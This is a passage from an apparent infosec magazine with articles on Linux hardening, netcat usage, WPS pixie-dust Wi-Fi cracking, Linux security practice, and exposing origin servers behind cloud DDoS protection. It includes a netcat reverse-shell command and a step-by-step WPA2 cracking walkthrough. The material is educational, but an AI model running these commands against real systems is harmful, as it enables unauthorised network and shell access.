Technical Systems Analyst for a nationally recognized hospital
working in the capacity of a Senior Desktop Engineer. He holds
current industry standard certifications. He enjoys writing & reverse
engineering code, analyzing malware, performing PoCs and figuring
out complex problems. His mindset is defender by day and
attacker by night. So that makes him part of the Purple Team by
design and a lover of all things infosec by nature.

35
What is Hardening? And
why i need it?
by Junior Carreiro

There are various methods for performing hardening of a system. These


methods can range from a door that closes the Firewall, even disabling certain
information that a web server may expose to the internet. We need to use a
hardening process to ensure that our environmental safety is at a maximum; this
because it greatly reduces the risk of having an exposure to breaches. However,
we always have to remember to keep a good level of adjustments between
security, functionality, and usability.

According to Wikipedia, Hardening is the term given to the process settings for a given system, where
these settings are designed to reduce vulnerabilities and security breaches.
Part of this process includes the removal/disabling of unnecessary services, adjustments in certain
configurations, removing users, and policy passwords, among others.
There are various methods for performing hardening of a system. These methods can range from 

a door that closes the Firewall, even disabling certain information that a web server may expose to the
internet.
We need to use a hardening process to ensure that our environmental safety is at a maximum; this
because it greatly reduces the risk of having an exposure to breaches. However, we always have to
remember to keep a good level of adjustments between security, functionality, and usability.

36
Where can I find information about hardening?
The Internet has lots of information about security and hardening settings.
Web sites’ of major companies and products such as RedHat, Oracle, Apache, have specific
documents about the settings.
Additionally, there are websites specializing in hardening documentation, such as the National Institute
of Standards and Technology. (http://www.nist.gov/) and Center of Internet Security (https://
www.cisecurity.org/). These sites have extensive documentation regarding hardening in various
systems and applications, such as operating system for servers, desktops and smartphones, systems
for web servers, database, and many others.

The hardening process


We can start the Hardening the process using a new installation, or we can apply it in production; 

in which case it will require a little more attention and review of the settings that need modifications.

Interestingly, we generate a report before and after our environment reset, to have knowledge of some
settings that are vulneraries; for this we can use the Linys, an audit system made by Cisofy (https://
cisofy.com/), when we execute the script, it shows us a report on the current scenario of our system.
The installation process is very simple:
[root@pwned ~]# git clone https://github.com/CISOfy/lynis
[root@pwned ~]# cd lynis/
[root@pwned lynis]# ./lynis audit system

The pictures below show some of the script exits:

37
With this report in hand, we can treat the items listed on it, and also pick up a document for reference.
For this article, I am using the document of recommendations for CentOS 6, which can be found on the
CIS website.

38
This document is separated by sectors:
!Install Updates, Patches, and Additional Security Software
!OS Services
!Special Purpose Services
!Network Configuration and Firewalls
!Logging and Auditing
!System Access, Authentication and Authorization
!User Accounts and Environment
!Warning Banners
!System Maintenance

Each of these sectors has a number of configuration recommendations, such as SSH,

We can create a script to automate this process and use tools like Puppet or Chef to run it. In the case
of the SSH settings, the script would look like the following:

39
[root@pwned ~]# cat hardning_ssh.sh

file_sshd="/etc/ssh/sshd_config"

echo "Creating security copies of sshd_config"

if [ -f $file_sshd.original ]
then
echo "The file already exists"
else
cp $file_sshd{,.original}
echo "Created file"
fi
sleep 2
echo ""
echo "##############################################" >> $file_sshd
echo "### Security Changes ###" >> $file_sshd
echo "##############################################" >> $file_sshd
echo ""
echo ">> Set LogLevel to INFO"
sleep 2
grep "^LogLevel" $file_sshd > /dev/null
parameter=`echo $?`
if test $parameter = 0
then
echo "- The parameter correct"
else
echo "#Set LogLevel to INFO" >> $file_sshd
echo "LogLevel INFO" >> $file_sshd
echo "- The parameter fixed"
fi

echo ""
echo ">> Disable SSH Password authentication"
sleep 2
grep "^PasswordAuthentication yes" $file_sshd > /dev/null
parameter=`echo $?`
if test $parameter = 1
then
echo "- The parameter correct"
else
sed -i 's/PasswordAuthentication yes/#PasswordAuthentication yes/g' $file_sshd
echo "#Disable SSH Password authentication" >> $file_sshd
echo "PasswordAuthentication no" >> $file_sshd
echo "- The parameter fixed"
fi

echo ""
echo ">> Disable SSH Root Login"
sleep 2
grep "^PermitRootLogin yes" $file_sshd > /dev/null
parameter=`echo $?`
if test $parameter = 1
then

40
echo "- The parameter correct"
else
sed -i 's/PermitRootLogin yes/#PermitRootLogin yes/g' $file_sshd
echo "#Disable SSH Root Login" >> $file_sshd
echo "PermitRootLogin no" >> $file_sshd
echo "- The parameter fixed"
fi

echo "Reload service SSH"


/etc/init.d/sshd reload

This script applies the key recommendations outlined in our document.


We can also use the lockdown, a system to choose which area of our OS that we want to apply the
settings too.

[root@pwned ~]# git clone https://github.com/BlackTieSecurity/LockDown.git


[root@pwned ~]# cd LockDown

You can run the install.sh, what is inside the folder, or you can open the file and install the
dependencies mually.an

We need to use a
hardening
process to ensure
that our
environmental
safety is at a
maximum.
The system is simple and easy to use, as you can see below:

[root@pwned ~]# ruby lockdown.rb --help


Usage: lockdown.rb [options]
Does not run in a production environment without reading the code. There are settings that can
affect directly your environment.
Options:
--accounts Apply config on Accounts and Environment

41
--boot Apply config on Boot Settings
--ssh Apply config on SSH Configuration
--ipv6 Disable IPv6
--services Disable Services
--kernel Apply config on kernel Parameters
--others Additional Process Hardening
--audit Logging and Auditing
--ntpd Configure NTPD
--pam Pam configuration
--password Password configuration
--permission Verifiy Permissions
--removesoft Remove Unnecessary Software - *Create a list of the software to be
uninstalled within /tmp/soft.lst
-A, --apllyall Apply all configurations
-v, --version Show Version
--message Show This Message

Conclusion
The process of hardening for any application or system is very important, as well as very tiring,
especially on a very large machine park. But as we saw the process is very important in reducing
failures and security breaches; moreover, automation of this process it is very important.

Author: Junior Carreiro

Junior Carreiro (aka _0x4a0x72)

Member of DC-Labs Security Team

Founder BlackTieSecurity

[https://br.linkedin.com/in/juniorcarreiro](https://br.linkedin.com/in/
juniorcarreiro)

[https://twitter.com/_0x4a0x72](https://twitter.com/_0x4a0x72)

[](https://twitter.com/_0x4a0x72)

42
43
Netcat with - Hacking
Backdoors
by Dhamu Harker

I will cover some of the uses of netcat, known as the “TCP/IP Swiss army knife”.
Netcat is a very powerful and versatile tool that can be used in diagnosing
network problems or in penetration testing.

What is Netcat
Netcat is a simple unix utility which reads and writes data across net-work connections, using TCP or
UDP protocol. It is designed to be a reliable “back-end” tool that can be used directly, or easily driven
by other programs and scripts.

The original netcat's features include:

• Outbound or inbound connections, TCP or UDP, to or from any ports


• Full DNS forward/reserve checking,with appropriate warnings
• Ability to use any local source port
• Ability to use any locally configured network source address
• Built-in port-scanning capabilities, with randomization
• Built-in loose source-routing capability
• Can read command line arguments from standard input
• Slow-send mode, one line every N seconds
• hex dump of transmitted and received data
• Optional ability to let another program service establish connections
• Optional telnet-options responder
• Featured tunneling mode which permits user-defined tunneling, e.g., UDP or TCP, with the possibility
of specifying all network parameters (source port/interface,
• listening port/interface, and the remote host allowed to connect to the tunnel).
• Rewrites like GNU's and OpenBSD's support additional features. For example, OpenBSD's nc
supports TLS.






44
Let us start with some basics:

Banner grabbing:
For establishing a simple connection with NC, for that you need to use the following command:

* nc -v domain.com 80
This information can vary as well, this time the bit we are interested in is the server version and the
operating system. Sometimes there is more to be discovered, like the PHP version that powers the
server etc.

Port scanning:

Netcat can also be used as a very basic port scanner:

* nc -v -n -z -w 1 domain.com 1-65535

Here we scanned the range of ports between 1 and 100, and we determined that ports 21 and 80 are
open. The -n switch disables DNS lookup, the -z is for not sending any data, thus reducing the time it
requires to talk to the ports. And the -w1 tells netcat to wait 1 second before determining that a
connection occurred. This is a TCP only scan. For UDP, add the -u flag.

45
Port scanning 2:

This is a different way to scan the open ports in sever

commands:

* nc -v -w 1 domain.com -z 1-1000

Netcat supports IPV6 connectivity:


The flag -4 or -6 specifies that netcat utility should use which type of addresses. -4 forces nc to use
IPV4 address while -6 forces nc to use IPV6 address.

Server $:
nc -4 -l 2389

Client $:
nc -4 localhost 2389

Now, if we run the netstat command, we see:

$ netstat | grep 2389

tcp      0   0 localhost:2389       localhost:50851       ESTABLISHED


tcp      0   0 localhost:50851      localhost:2389        ESTABLISHED

Now, If we force nc to use IPV6 addresses

The first field in the above output would contain a postfix ‘6’ in case the IPV6 addresses are being
used. Since in this case it is not, thus a connection between server and client is established using IPV4
addresses.

46
Server :

$ nc -6 -l 2389

Client :

$ nc -6 localhost 2389

Now, if we run the netstat command, we see:

$ netstat | grep 2389

tcp6     0   0 localhost:2389        localhost:33234      ESTABLISHED


tcp6     0   0 localhost:33234       localhost:2389       ESTABLISHED
----------------------------------------------------------------------------------------------------

So now a postfix ‘6’ with ‘tcp’ shows that nc is now using IPV6 addresses.

Netcat is a simple unix


utility which reads and
writes data across net-
work connections, using
TCP or UDP protocol.
Force Netcat Server to stay up:
If the netcat client is connected to the server, and then after sometime the client is disconnected, then
normally netcat server also terminates.

Commands:

Server :
$ nc -l 2389

Client:
$ nc localhost 2389

Server :
$ nc -l 2389

47
This behavior can be controlled by using the -k flag at the server side to force the server to stay up
even after the client has disconnected.

Commands :

Server :
$ nc -k -l 2389

Client :
$ nc localhost 2389

Server :
$ nc -k -l 2389

So we see that by using the -k option the server remains up even if the client got disconnected.

Copying a file from one system to the other:


nc -lp 1234 > config.tar.gz

On server1, run

nc -w 1 server2.example.com 1234 < config.tar.gz

Netcat supports timeout:

There are cases when we do not want a connection to remain open forever. In that case, through ‘-w’
switch we can specify the timeout in a connection. So after the seconds specified along with -w flag,
the connection between the client and server is terminated.

Server :
$ nc -l 2389

Client :
$ nc -w 10 localhost 2389

The connection above would be terminated after 10 seconds.

NOTE : Do not use the -w flag with -l flag at the server side; in that case -w flag causes no effect and
hence the connection remains open forever.

48

Netcat reverse shell linux :

Netcat is rarely present on production systems and even if it is, there are several version of netcat,
some of which do not support the -e option.

$nc -lvp 443


$nc -nv ipaddress 443 -e /bin/sh

Configure Netcat Client to stay up after EOP:

Netcat client can be configured to stay up after EOF is received. In a normal scenario, if the nc client
receives an EOF character then it terminates immediately, but this behavior can also be controlled if the
-q flag is used. This flag expects a number which depicts the number of seconds to wait before the
client terminates (after receiving EOF).

Client should be started like:

$nc  -q 5  localhost 2389

Now, if the client ever receives an EOF, then it will wait for 5 seconds before terminating.

Sevice web pages:

You can even use netcat to act as a web server :

Command:
$nc-l -p 80 -q 1<somepage.html

This would serve the page somepage.html until you close the terminal window.

Author: Dhamu Harker


Dhamotharan is a security professional working at Brisk Infosec
Solution LLP with in depth knowledge in Penetration Testing and
offensive security. He is a conventional member of National Cyber
Defence Research Centre . He is continuing his work as a security
researcher in IT Security.

49
Cracking WPA2 via Pixie
dust attack
by Jose Rodriguez

In this article, a technique known as a pixie-dust attack will be demonstrated,


where an attacker could, in a relatively short amount of time crack the WPA/2
PSK. The attack consist of cracking the WPS PIN by attempting to associate it
with the access point, and getting cryptographic information to later crack the
PSK, and gain access.

Wireless is a great and convenient technology that facilitates are access to the same things we would
do on a computer that is connected to the network via an Ethernet cable. Things like: latest news,
entertainment, social media, games, and even communicating with relatives/friends while lying in bed
without the annoyance of cables. However, it could also be a serious risk when security is left out of the
equation. With increasing cyber attacks being the norm today, people are becoming more security
aware; although some still see it as stubborn, and non-functional. Throughout my career as a security
analyst, and network security engineer I have come across a number of big companies that still have 

an old audio/visual system that requires WEP as the encryption standard, and this equipment is being
bridged to corporate networks. It is not uncommon to occasionally come across a home/small
business wireless router that is not properly configured, and just by virtue of creating passwords of 15+
characters it is assumed to be secure. But all it takes is a clever attacker to find another vulnerability,
and circumvent the very long password.

Cracking WPA/WPA2-PSK via Pixie-dust attack in action.

Before starting the attack, there are some preparation steps that need to be performed in order for the
process to work as reliable as possible. First bring down your wireless interface. In this example the
wireless interface is referred to as WLAN2. It could be different based on different factors. Check what
yours is referenced to.

Note: The following example is based on Kali 2.0

50
Bring down the wireless interface. You can do this by typing:
ifconfig yourwirelessinterface down
(ifconfig wlan2 down)

Note: if no error is displayed, the command was successful

By issuing the command ifconfig we can verify only the loopback interface is displayed.

51
To display all the services that are running in reference to the wireless interface. Type the following
command: airmon-ng check

As we can see on the picture displayed below, several processes are running and will need to be
terminated to avoid unexpected behavior.

52
To terminate the processes type: airmon-ng check kill PID#
(airmon-ng check kill 591)

Note: kill all the processes listed by airmon-ng

53
After killing all processes proceed to change the mac address of your wireless interface. To accomplish
this we can use macchanger –r wlan2 (note: the –r switch in macchanger generates a random mac
address. You could manually specify the desired mac address with the –m switch. Use macchanger –
help for additional options)

Now proceed to change the mode of operation of the wireless card to monitor. That way wireless waves
can be sniffed. This can be accomplished by typing:
iwconfig yourwirelesscard

(iwconfig wlan2 mode monitor)

54
To confirm the wireless interface is in monitor mode type: iwconfig wlan2

Bring up the wireless interface, type: ifconfig yourwirelessinterface up (ex:ifconfig wlan2 up)

Now we are going to use a tool known as wash (Wireless Protected Setup Tool Scan Tool)

Type: wash –i yourwirelessinterface (ex: wash –i wlan2)

Note: you can specify channel, and more options (see wash –help)

If the field “WPS Locked” displays YES, more than likely this attack will not work on that router. NOTE:
if you get a bunch of errors about error checking fcs
Add the following line to the end of the command --ignore-fcs

55
Now that we have selected our target, let us initiate the attack with the use of a tool called reaver. Type:
reaver –b macaddressof yourtargetap –i yourwirelessinterface –c channel –vv –S –K 1

(reaver –b c8:3A:35:f9:4b:58 –i wlan2 –c 6 –vvv –K 1 –S –N)

Commands explained:

reaver [the tool itself[


-i [to specify the wireless interface]
-c [the channel the AP is using to broadcast it’s SSID]
-vvv [verbosity level in terms of seeing feedback when performing the attack]
-K 1 [pixiewps tool that will run to crack both the PIN and the WPA/2 PSK]
-S [to capture small diffie-helman data, this is used to speed up the attack]
-N [to avoid sending a NACK back to the AP when performing the attack. Think of it as the AP replying,
“not it did not work”, and your card replying “It didn’t?”

















56

You should see a lot of information scroll down quickly

Scroll down until you find the PIN, and the WPA/WPA2 PSK. Note: this process could take anywhere
from a few minutes to hours, depending on several factors (ex: network traffic, signal quality, etc.)

57
Using the information obtained, you should be able to establish a connection to the AP, and
authenticate like a regular device
.
Note: Do not forget to set your interface card back to managed mode, and restart the daemons
responsible to manage the connection before trying to connect. Below are the steps to change the
wireless card mode, and restart the necessary daemons.

Bring down your network interface

58
To change the mode of operation mode back to default type:
iwconfig yourwirelessinterfacecard mode managed

(iwconfig wlan2 mode managed)

Bring up your wireless interface by typing: ifconfig yourwirelessinterface up (ifconfig wlan2 up)

59
Then you will need to restart the normal network daemons that are responsible for handling the wireless
connections.

The commands are:

/etc/init.d/networking restart
/etc/init.d/network-manager restart

Conclusion

As a security measure, disable WPS on the wireless router if absolutely no other choice in terms of 

a device. Keeping this option available could serve well a malicious user, and could lead to 

a compromise. More modern routers are coming with features such as PIN lockout after x number of
failed attempts, or throttling technology.

Tools:
Airmon-ng www.aircrack-ng.org Included in Kali 2.0
Reaver included in Kali 2.0
Pixie-wps Included in Kali 2.0

Author: Jose Rodriguez

I currently hold the following certifications CCNA,Sec+,Net


+,Project+,Server+,LPIC-1, SUSE 11, Linux+, A+, HP-ATA
Networks, ACSP and CEH. Also have around 5 years of
experience in the Security field performing vulnerability
assesments, penetration testing, system hardening, and
network security. 

60
Linux Security - Best
practice
by Ragul Balakrishan

Due to the increased reliance on powerful networked computers to help run


businesses and keep track of our personal information, entire industries have
been formed around the practice of networking and computer security.
Enterprises have solicited the knowledge and skills of security experts to
properly audit systems and tailor solutions to fit the operating requirements of
their organizations.

Tracking Security Updates


Briefing about security and other updates from Red Hat can be updated to the servers - see below.

Understanding Red Hat security ratings:

Red Hat Product Security rates the impact of security issues found in Red Hat products using a four-
point scale (Low, Moderate, Important, and Critical), as well as Common Vulnerability Scoring System
(CVSS) base scores. These provide a prioritized risk assessment to help you understand, and schedule
upgrades to your systems, enabling informed decisions on the risk each issue places on your unique
environment.

To list all available erratas without installing them, run:


# yum updateinfo list available
To list all avai due to the lable security updates without installing them, run:
# yum updateinfo list security all
To get a list of the currently installed security updates this command can be used:
# yum updateinfo list security installed
# yum updateinfo list
This system is receiving updates from RHN Classic or RHN Satellite.
RHSA-2014:0159 Important/Sec. kernel-headers-2.6.32-431.5.1.el6.x86_64
RHSA-2014:0164 Moderate/Sec. mysql-5.1.73-3.el6_5.x86_64

61
RHSA-2014:0164 Moderate/Sec. mysql-devel-5.1.73-3.el6_5.x86_64
RHSA-2014:0164 Moderate/Sec. mysql-libs-5.1.73-3.el6_5.x86_64
RHSA-2014:0164 Moderate/Sec. mysql-server-5.1.73-3.el6_5.x86_64
RHBA-2014:0158 bugfix nss-sysinit-3.15.3-6.el6_5.x86_64
RHBA-2014:0158 bugfix nss-tools-3.15.3-6.el6_5.x86_64
If you want to apply only one specific advisory:
# yum update --advisory=RHSA-2014:0159
However, if you would like to know more information about this advisory before applying it:
# yum updateinfo RHSA-2014:0159

Severity Rating Description


Critical impact This rating is given to flaws that could be easily exploited by a remote
unauthenticated attacker and lead to system compromise (arbitrary code execution)
without requiring user interaction. These are the types of vulnerabilities that can be
exploited by worms. Flaws that require an authenticated remote user, a local user, or
an unlikely configuration are not classed as Critical impact.

Important impact This rating is given to flaws that can easily compromise the confidentiality,
integrity, or availability of resources. These are the types of vulnerabilities that
allow local users to gain privileges, allow unauthenticated remote users to view
resources that should otherwise be protected by authentication, allow authenticated
remote users to execute arbitrary code, or allow remote users to cause a denial of
service.

Moderate impact This rating is given to flaws that may be more difficult to exploit but could still lead
to some compromise of the confidentiality, integrity, or availability of resources,
under certain circumstances. These are the types of vulnerabilities that could have
had a Critical impact or Important impact but are less easily exploited based on a
technical evaluation of the flaw, or affect unlikely configurations.

Low impact This rating is given to all other issues that have a security impact. These are the
types of vulnerabilities that are believed to require unlikely circumstances to be able
to be exploited, or where a successful exploit would give minimal consequences.

How to validate the RPM scripts before installation


RPM packages have several types

The preinstall Script:
The preinstall script executes just before the package is to be installed.

The postinstall Script:
The postinstall script executes after the package has been installed. If a package uses
a postinstall script to perform some function, quite often it will include a postinstallun script that
performs the inverse of the postinstall script, after the package has been removed.

62
The preuninstall Script:
If there is a time when your package needs to have one last look around before the user erases it, the
place to do it is in the preuninstall script. Anything that a package needs to do immediately prior to
RPM taking any action to erase the package can be done here.

The postuninstall Script:
The postuninstall script executes after the package has been removed.

Sample Output:

[root@sampleroot]# rpm -q --scripts kernel.x86_64


postinstall scriptlet (using /bin/sh):
if [ `uname -i` == "x86_64" -o `uname -i` == "i386" ]; then
if [ -f /etc/sysconfig/kernel ]; then
/bin/sed -i -e 's/^DEFAULTKERNEL=kernel-smp$/DEFAULTKERNEL=kernel/' /etc/sysconfig/kernel ||
exit $?
fi
fi
/sbin/new-kernel-pkg --package kernel --mkinitrd --depmod --install 2.6.18-406.el5 || exit $?
if [ -x /sbin/weak-modules ]
then
/sbin/weak-modules --add-kernel 2.6.18-406.el5 || exit $?
fi
preuninstallscriptlet (using /bin/sh):
/sbin/new-kernel-pkg --rminitrd --rmmoddep --remove 2.6.18-406.el5 || exit $?
if [ -x /sbin/weak-modules ]
then
/sbin/weak-modules --remove-kernel 2.6.18-406.el5 || exit $?
fi

Secure Individual Files with File System Attributes


Most of Linux admins know how to secure the individual files by modifying the permissions or by
changing the user and/or group ownership of files. The ext4 and XFS file systems have additional file
attributes that can help secure a file from being deleted or overwritten.

1. If a file is accessed with ‘A‘ attribute set, its atime record is not updated.
2. If a file is modified with ‘S‘ attribute set, the changes are updated synchronously on the disk.
3. A file is set with ‘a‘ attribute, can only be open in append mode for writing.
4. A file is set with ‘i‘ attribute, cannot be modified (immutable). This means no renaming, no symbolic
link creation, no execution, no writable, only a superuser can unset the attribute.
5. A file with the ‘j‘ attribute is set, all of its information is updated to the ext3 journal before being
updated to the file itself.
6. A file is set with ‘t‘ attribute, means no tail-merging.
7. A file with the attribute ‘d‘, is now not a candidate for backup when the dump process is run.
8. When a file has ‘u‘ attribute is deleted, its data is saved. This enables the user to ask for its
undeletion.

63
To list attributes:

[root@serverX]# lsattr

----i--------e- ./anaconda-ks.cfg

To make changes:

[root@serverX]# chattr –e ./anaconda-ks.cfg

----i---------- ./anaconda-ks.cfg

Monitoring for file system changes


Filesystem monitoring can be done using aide, as seen below.

1. Add the files to monitor


The files that needs to be monitored by aide have to be added in the /etc/aide.conf file. The aide
package by default installs a reasonable aide.conf file that monitors most of the system files. Each file
is assigned a set of attributes that are to be monitored. By default, the following groups are defined:

NORMAL = R+rmd160+sha256

# For directories, do not bother doing hashes


DIR = p+i+n+u+g+acl+selinux+xattrs

P=permission i=inode u=user g=group


# Access control only
PERMS = p+i+u+g+acl+selinux
To understand each of the above attributes, check "man aide.conf" and customize aide.conf as per
your needs.

Ex:
1. /dir1 group Performs group check for /dir1 and its sub-directories.
2. =/dir2 group Performs group check for /dir2 alone.
3. !/dir3 group skips group check for /dir3 alone.

2. Build baseline database

To build the initial database, run the following command:


# /usr/sbin/aide --init
This will create the database file here: /var/lib/aide/aide.db.new.gz

3. Protect the database and configuration


Ensure that /etc/aide.conf, /usr/sbin/aide, and /var/lib/aide/aide.db.new.gz are stored in a secure,
preferably read-only media, so that they are not tampered with.

64
4. Periodically perform integrity checks
First, copy the baseline database, i.e. /var/lib/aide/aide.db.new.gz to /var/lib/aide/aide.db.gz. This is the
location aide will look for the input database by default.
The following command will check the system files against the database for inconsistencies and
generate a report:

# /usr/sbin/aide --check

Password Protecting GRUB

“Boot Loader Passwords” can be implemented by adding a password directive to its configuration file.
To do this, first choose a strong password, open a shell, log in as root, and then type the following
command:
#/sbin/grub-md5-crypt

When prompted, type the GRUB password and press Enter. This returns a MD5 hash of the
Password. Next, edit the GRUB configuration file /boot/grub/grub.conf. Open the file and below the
timeout line in the main section of the document, add the following line:

#password --md5 <password-hash>

Replace <password-hash> with the value returned by /sbin/grub-md5-crypt.


The next time the system boots, the GRUB menu prevents access to the editor or command interface
without first pressing “p” followed by the GRUB password.

Author: Ragul Balakrishan

Ragul Balakrishnan, a Red Hat Certified


Architect. I have been working professionally
with Linux and Open Source for over 6 years.
Working on Linux is my passion and i love
troubleshooting complex issues.

65
Weak points MDDoS
protection
by Tomasz Krupa

DDoS attacks have become increasingly powerful over the last few years.
Around one and a half years ago (early 2014), security holes in NTP protocol
(Network Time Protocol) have been exploited in order to conduct amplification
attacks of previously unseen magnitude.

Mass Distributed Denial of Service has also become very popular- mostly due to
ease of execution (Read: does not take much imagination), availability of tools
(for a few dollars tools such as booters or stressers can perform attacks), and
finally, widespread botnets networks.

Weak points in Distributed Denial of Service Cloud defence systems (aka looking for holes in Cloud
base Security Providers framework).

66
The Concept and main players
This article will touch a few base points on Cloud architecture, mechanism, and concepts used to
mitigate such attacks. I will also try to highlight a few points where network admins can strengthen their
security and prevent some vital information from being leaked onto the Internet.
The concept behind securing against Mass DDoS in the Cloud is very simple, cloud providers through
the chain of Content Delivery Networks and various endpoints, can disperse malicious traffic. This
solely relies on changing DNS settings and identifying malicious web traffic, which then is routed into
separate segments of the infrastructure protecting companies’ valuable assets.

A) Modus Operandi
Infrastructure designed by the Cloud based Security Providers, act as reverse proxies for the web
servers that require protection from Mass DDoS or any malicious traffic. Those reverse proxies inspect
traffic for various clients simultaneously, by routing it through their own distributed infrastructure (using
powerful Public Cloud such as AWS or Azure).
Highly available Cloud based infrastructure acts as a very powerful filter that can absorb huge volumes
of traffic. Also often integrated Web Application Firewalls can inspect and filter malicious traffic on the
application layer and protect against SQL injections or XSS attacks.

B) DNS rerouting vs BGP rerouting.


There are several different strategies existing for the actual traffic redirection. I will describe the logic
behind the two most common approaches:
First, is the DNS rerouting which is integrated using appliance deployed on customer premises; the
appliance capture’s all the traffic, and in case of the attack being detected, the DNS settings of the
customer domain are redirected into IP address belonging to CBSP scrubbing-centre (insert the text
box with definition)
BGP rerouting is more complex and applies into the entire /24 IP block- only if the entity managing
website controls the entire block- it can withdrawn
The BGP announcements for that IP range from their own network.
Consequently, all the traffic will start flowing through the CBSP “Scrubbing
Centres” (see Figure 1).
Since the BGP rerouting require additional hardware and from administrative point of view might be 

a bit challenging, DNS rerouting which uses a series of transparent DNS proxies is the solution for the
masses and is most widely adopted.

C) Content Distribution Networks and CBSPs


CDN's are the core of Cloud based Security against the Mass DDoS. Designed to cache static content
closer to the user’s geographical location, this by using a series of edge location conveniently located
around the globe. This setup reduces response time, load, and bandwidth of a website’s main server.
Further to that, CDN has an ability to look inside of the traffic and inspect headers- making decision to
either present requester with locally cached static files, or ask the server to dynamically generate
content.
Content Delivery Network, together with scrubbing centre and Web Application Firewall, will constitute
ideal defence against the Mass Distributed Denial of Service, only if it will be so easy…

67
The “origin exposure”- biggest hole in Cloud-based Security
framework
The concept of cloud-based security relies on keeping the underlying web server (origin) secret and
inaccessible by direct traffic. Since the DNS rerouting is achieved by hiding the origin's IP address, and
relying on redirection through the use of website's domain name- if the attackers are able to discover
the real IP address of the origin, they can target the web server directly, going around the majority of
security mechanism and being able to hit directly with high volume traffic.
The risk of origin exposure has been classified as a security concern and raised in a few interesting
documents:
• D. McDonald- “The Pentesters Guide to Akamai”. https://www.nccgroup.com/media/230388/the
pentesters guide to akamai.pdf, 2013
• A.Nixon and C. Camejo- “DDoS protection bypass techniques” @ Black Hat USA, 2013.

Also receiving some attention from security companies:


• D. Lewis. “Bypassing Content Delivery Security”. https://blogs.akamai.com/2013/08/bypassing-
contentdelivery-security.html, 2013.
• N. Sullivan. “DDoS Prevention: Protecting The Origin”. https://blog.cloudflare.com/ddos-
preventionprotecting-the-origin/, 2013.
• R. Westervelt. “Cloud-Based DDoS Protection Is Easily Bypassed, Says Researcher”. http://
www.crn.com/news/security/240159295/cloudbased-ddos-protection-is-easily-bypassed-
saysresearcher.htm, 2013.

Any files that were created


during the development or
configuration phase, can
be used to expose a server’s
origin, especially when
they show detailed
information.

A) IP History- origin-exposing vector


If the origin is still assigned the same IP address as before the adoption of CBSP, the server can be
exposed through historical knowledge of the domain and its corresponding IP address. 


68
Several companies specialise in harvesting data about domain names by continually tracking their DNS
configuration- the data mostly being used for marketing purposes.
Domains that are not sharing their zone files, and are not being indexed, are not immune to this
exposing vector. If an attacker has been targeting a particular victim for a prolonged period of time, 

he would gather enough information to trigger an attack against the origin's IP.
CBSPs recommend administrators to assign new IP address for their servers after migrating DNS
records to the CBSPs.

B) Exposing origin via suddomains in HTTP headers


Because the CBSP logic is based on detecting traffic as a reverse proxy- it relies on information
available in HTTP requests to distinguish between requests intended for different servers (clients). To be
precise, the mechanism detects the domain listed in the HTTP Host header, based on that it can
correctly forward incoming traffic to the intended origin.
One of the side effects is that the protocols which do not contain host information, such as FTP and
SSH, cannot be properly handled by the CBSPs’ proxies and are thus, by default, broken.
To mitigate any possible leak of IP addresses, and keeping the FTP functionality, administrators can
create a specific subdomain- directly resolving to the origin’s IP address.
This provides a convenient tool for non-web protocols to bypass the CBSP and establish a direct
connection with the origin. This is not ideal, and creates yet another backdoor, plus it enables the
attacker to perform a brute force attack. For all administrators keen on keeping FTP, as well as
exposing it to the outside world, there is a very good article published on stakeexchange.com, which
does contain few interesting steps and is well explained -> https://security.stackexchange.com/
questions/23124/good-practices-to-secure-ftp-access

C) Temporary exposure of the domain origin via additional DNS records


It is very important to remember that once the DNS records have been "taking over" by the CBSP
provider, the original IP address will still be present in the other DNS records- such as MX,

69
CNAMES, or TXT. The patient attacker who is spending lots of time on the reconnaissance will certainly
be on the watch out for those headers (which might be exposed briefly, during maintenance or
changing the CBSP provider.
Administrators should be aware of this and as described with IP address origin leak- it is very important
to update the IP address of the webservers which are being migrated onto the Cloud CDNs

D) Why SSL certificates should be handled by CBSP and not exchanged very often
If administrators want to enable HTTPS for their website while under the protection of a CBSP, they can
let the CBSP set up a certificate for their domain. This enables the CBSP to take care of securing the
front-end connection between their own cloud infrastructure and a visitor. Alternatively, the
administrator can hand over the private key of their origin’s certificate to the CBSP. In this case, the
CBSP can set up the front-end SSL connection with the website’s own certificate. In order to secure
the back-end connection between the CBSP and the origin, the origin must present a certificate.
However, this certificate lists the domain name as the subject, and therefore identifies itself as the
origin.

E) Sensitive files- why any development leftovers should be deleted


Any files that were created during the development or configuration phase, can be used to expose 

a server’s origin, especially when they show detailed information. Furthermore, verbose error pages and
log files can also disclose the origin. It is very important for these types of files to be removed once 

a website goes into production.

It doesn’t look very promising, so what’s the alternative?


Even though the origin exposing vector attacks are affecting large portion of Cloud based Security
providers, and are difficult to completely seal and secure, I can see that there is a growing market for
the security oriented Cloud.
Only the Public Cloud can stand against mass attacks of very high magnitude and be able to operate
normal service providing business to the customers. Thanks to the design and scalability, attacks using
the exposed origin will, in my opinion, slowly decline- especially as more administrators are aware and
getting to know the logic behind attack vectors.
This part only “touches” the expose origin attacks, which are far more elaborate and time consuming.
In the next part I will try to explain with a few examples how captured origin is actually genuine, and
what can be just a random noise created by a dynamically generated website.
Thank you very much for your time, I hope you enjoyed reading this short bit and I have inspired some
to do further research.

Note: I can assure that none of the innocent domains has been harmed in preparation to this article. 

No DNS record has been violated, nor the origin IP exposed. I based all the research on publicly
available tools.

Author: Tomasz Krupa


Security Researcher, Linux Debian and London Arsenal big fan,
AWS Infrastructure Engineer

LPIC-1 Certified, currently studying for AWS Solutions


Architect

70

S-ar putea să vă placă și